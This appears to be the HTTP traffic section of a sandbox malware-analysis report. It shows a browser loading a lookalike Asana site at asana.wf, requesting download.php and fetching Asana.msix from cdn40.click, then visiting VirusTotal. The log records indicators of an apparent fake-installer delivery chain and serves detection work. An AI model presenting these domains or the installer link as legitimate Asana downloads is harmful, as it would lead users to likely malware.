          Source: global trafficHTTP traffic detected: GET /img/HOME24-web-hero-gartner-2x-en-US.webp HTTP/1.1Host: asana.wfConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/HOME24-web-hero-forrester-2x-en-US.webp HTTP/1.1Host: asana.wfConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/HOME24-web-hero-IDC-2x-en-US.webp HTTP/1.1Host: asana.wfConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/card-zoom-1x.webp HTTP/1.1Host: asana.wfConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/card-figma-asana-customer.webp HTTP/1.1Host: asana.wfConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/card-sony-music-asana-customer.webp HTTP/1.1Host: asana.wfConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /assets/svg/icons.svg HTTP/1.1Host: asana.wfConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: imageReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/home24-demo-thumbnail.webp HTTP/1.1Host: asana.wfConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/home24-resources-thumbnail.webp HTTP/1.1Host: asana.wfConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/home24-templates-thumbnail.webp HTTP/1.1Host: asana.wfConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/HOME24-web-hero-gartner-2x-en-US.webp HTTP/1.1Host: asana.wfConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/HOME24-web-hero-forrester-2x-en-US.webp HTTP/1.1Host: asana.wfConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/HOME24-web-hero-IDC-2x-en-US.webp HTTP/1.1Host: asana.wfConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /assets/img/brand/asana-logo-favicon.ico HTTP/1.1Host: asana.wfConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /assets/img/brand/asana-logo-favicon.ico HTTP/1.1Host: asana.wfConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /download.php HTTP/1.1Host: asana.wfConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /files/Asana.msix HTTP/1.1Host: cdn40.clickConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=3pC1lROSsYyfH1k&MD=af7277zy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=vir&oit=1&cp=3&pgcl=4&gs_rn=42&psi=3aV4RE0JYE4q_43B&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=viru&oit=1&cp=4&pgcl=4&gs_rn=42&psi=3aV4RE0JYE4q_43B&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=virus&oit=1&cp=5&pgcl=4&gs_rn=42&psi=3aV4RE0JYE4q_43B&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=virust&oit=1&cp=6&pgcl=4&gs_rn=42&psi=3aV4RE0JYE4q_43B&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=virusto&oit=1&cp=7&pgcl=4&gs_rn=42&psi=3aV4RE0JYE4q_43B&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=virustotal&oit=1&cp=10&pgcl=4&gs_rn=42&psi=3aV4RE0JYE4q_43B&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=virustotal.&oit=1&cp=11&pgcl=4&gs_rn=42&psi=3aV4RE0JYE4q_43B&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=virustotal.c&oit=1&cp=12&pgcl=4&gs_rn=42&psi=3aV4RE0JYE4q_43B&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=virustotal.co&oit=3&cp=13&pgcl=4&gs_rn=42&psi=3aV4RE0JYE4q_43B&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=virustotal.com&oit=3&cp=14&pgcl=4&gs_rn=42&psi=3aV4RE0JYE4q_43B&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /gui/ HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /gui/main.92c57b63482d090b859f.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /recaptcha/api.js?render=explicit HTTP/1.1Host: www.recaptcha.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /gui/2121f4aabac6fbe523ec.woff2 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.virustotal.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.virustotal.com/gui/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /gui/1402accbefdec6a25762.woff2 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.virustotal.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.virustotal.com/gui/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /gui/ee990a93df71bfdfb3b5.woff2 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.virustotal.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.virustotal.com/gui/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /ui/user_notifications HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTIwNTMyNTQzNTMtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTE1LjEzNA==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /ui/cookie_disclaimer HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTQ0MTY0MjIwNjMtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTE1LjE0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /gui/stackdriver-errors.b289406877fe6574d5ac.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /gui/76446.6d2379a7770bf21c8233.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /gui/30578.8f26f81ecad64b338ebc.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
